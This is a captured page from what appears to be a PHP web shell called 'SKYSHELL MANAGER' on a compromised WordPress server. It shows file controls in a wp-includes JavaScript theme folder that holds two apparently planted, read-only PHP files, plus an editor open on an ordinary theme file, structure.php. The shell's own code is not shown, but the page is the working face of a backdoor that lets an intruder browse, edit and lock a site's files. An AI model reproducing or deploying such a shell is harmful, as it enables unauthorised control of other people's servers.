📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: structure.php
<?php /** * Theme functions related to structure. * * This file contains structural hook functions. * * @package Louder */ if ( ! function_exists( 'louder_doctype' ) ) : /** * Doctype Declaration. * * @since 1.0.0 */ function louder_doctype() { ?><!DOCTYPE html> <html <?php language_attributes(); ?>><?php } endif; add_action( 'louder_action_doctype', 'louder_doctype', 10 ); if ( ! function_exists( 'louder_head' ) ) : /** * Header Codes. * * @since 1.0.0 */ function louder_head() { ?> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <?php if ( is_singular() && pings_open( get_queried_object() ) ) : ?> <link rel="pingback" href="<?php echo esc_url( get_bloginfo( 'pingback_url' ) ); ?>"> <?php endif; } endif; add_action( 'louder_action_head', 'louder_head', 10 ); if ( ! function_exists( 'louder_page_start' ) ) : /** * Add Skip to content. * * @since 1.0.0 */ function louder_page_start() { ?><div id="page" class="site"><a class="skip-link screen-reader-text" href="#content"><?php esc_html_e( 'Skip to content', 'louder' ); ?></a><?php } endif; add_action( 'louder_action_before', 'louder_page_start', 10 ); if ( ! function_exists( 'louder_header_start' ) ) : /** * Header Start. * * @since 1.0.0 */ function louder_header_start() { ?> <header id="masthead" class="site-header" role="banner"><?php } endif; add_action( 'louder_action_before_header', 'louder_header_start' ); if ( ! function_exists( 'louder_header_end' ) ) : /** * Header Start. * * @since 1.0.0 */ function louder_header_end() { ?></header> <!-- header ends here --><?php } endif; add_action( 'louder_action_header', 'louder_header_end', 15 ); if ( ! function_exists( 'louder_content_start' ) ) : /** * Header End. * * @since 1.0.0 */ function louder_content_start() { ?> <div id="content" class="site-content"> <?php } endif; add_action( 'louder_action_before_content', 'louder_content_start', 10 ); if ( ! function_exists( 'louder_footer_start' ) ) : /** * Footer Start. * * @since 1.0.0 */ function louder_footer_start() { if( !(is_home() || is_front_page()) ){ echo '</div>'; } ?> </div></div> <footer id="colophon" class="site-footer" role="contentinfo"> <?php } endif; add_action( 'louder_action_before_footer', 'louder_footer_start' ); if ( ! function_exists( 'louder_footer_end' ) ) : /** * Footer End. * * @since 1.0.0 */ function louder_footer_end() {?> </footer><div class="backtotop"><i class="fas fa-caret-up"></i></div><?php } endif; add_action( 'louder_action_after_footer', 'louder_footer_end' );
Save